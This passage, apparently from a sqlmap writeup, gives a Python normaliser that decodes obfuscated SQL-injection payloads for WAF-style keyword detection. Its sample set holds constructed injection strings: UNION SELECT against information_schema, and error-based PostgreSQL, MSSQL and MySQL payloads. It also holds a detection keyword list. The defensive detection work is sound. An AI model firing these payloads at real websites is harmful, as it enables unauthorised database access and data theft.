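The space2comment and randomcase tamper scripts used in this writeup, and the CHR()/CHAR()/0x-encoded payloads in the sqlmap sessions above (the --hex and --wizard output), all defeat filters that match raw request text. As an added example (not sqlmap or tamper-script code; the sample requests are constructed, not real traffic), this Python normaliser undoes those encodings before keyword matching, the same idea as the removeComments/lowercase/urlDecodeUni transformations a WAF such as ModSecurity applies:

```python
"""
Normalise SQL-injection payloads obfuscated the way this page shows:
  - /**/ in place of spaces          (space2comment tamper)
  - UnIoN SeLeCt keyword casing       (randomcase tamper)
  - CHR(58)||CHR(118) / CHAR(58)+CHAR(118) chains (PostgreSQL / MSSQL)
  - 0x716a6b7871 hex string literals  (MySQL)
Added example, not sqlmap code. SAMPLES are constructed inputs.
"""
import re
from urllib.parse import unquote_plus

# Any inline comment used as whitespace (space2comment).
_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# Two or more CHR(n)/CHAR(n) calls joined by '||' or '+'. The operator is
# optional because a URL-decoding log pipeline turns '+' into a space,
# exactly as happened to the MSSQL payloads quoted on this page.
_CHR_CHAIN_RE = re.compile(r"(?:CHA?R\(\d+\)\s*(?:\|\||\+)?\s*){2,}", re.I)
_CHR_RE = re.compile(r"CHA?R\((\d+)\)", re.I)

# 0x.. literal with an even number of hex digits.
_HEX_RE = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

# What a simple rule looks for once the text is normalised.
SQLI_KEYWORDS = ("UNION SELECT", "INFORMATION_SCHEMA", "SLEEP(",
                 "WAITFOR DELAY", "VERSION()", "CONVERT(INT")

# Constructed sample query strings, modelled on the payloads shown above.
SAMPLES = {
    "space2comment": "id=1'/**/UnIoN/**/SeLeCt/**/1,2,3/**/FrOm/**/information_schema.tables--",
    "url_encoded": "id=1%27%20UNION%2F%2A%2A%2FSELECT%20NULL%2CNULL--",
    "pg_chr": "id=1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||VERSION()::text AS NUMERIC)",
    "mssql_char": "id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)))",
    "mysql_hex": "id=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ",
    "benign": "id=1&page=2",
}


def _decode_chr_chain(match):
    """CHR(58)||CHR(118)... -> ':v...' as a quoted literal."""
    codes = (int(c) for c in _CHR_RE.findall(match.group(0)))
    return "'" + "".join(chr(c) for c in codes if c < 0x110000) + "'"


def _decode_hex(match):
    """0x716a6b7871 -> 'qjkxq'; non-text bytes are left as the literal."""
    try:
        return "'" + bytes.fromhex(match.group(1)).decode("utf-8") + "'"
    except UnicodeDecodeError:
        return match.group(0)


def normalize(payload):
    """Return the payload roughly as the database engine sees it (case kept)."""
    s = unquote_plus(payload)                    # 1. percent-decode, '+' -> ' '
    s = _COMMENT_RE.sub(" ", s)                  # 2. undo space2comment
    s = _CHR_CHAIN_RE.sub(_decode_chr_chain, s)  # 3. CHR()/CHAR() chains
    s = _HEX_RE.sub(_decode_hex, s)              # 4. 0x.. literals
    return re.sub(r"\s+", " ", s).strip()        # 5. collapse whitespace


def matched_rules(payload):
    """Keywords present after normalising; upper-casing undoes randomcase."""
    text = normalize(payload).upper()
    return [k for k in SQLI_KEYWORDS if k in text]


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:14s} {normalize(raw)}")
        print(f"{'':14s} rules: {matched_rules(raw)}")
```

Decoding the CHR chain also recovers the `:vtj:` / `:nxb:` markers sqlmap wraps its output in, which is how the value inside the PostgreSQL error message above can be picked out of a log.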
Two good articles I read recently, for reference: 1. http://www.freebuf.com/articles/web/10789.html 2. https://www.waitalone.cn/sqlmap-users-manual.html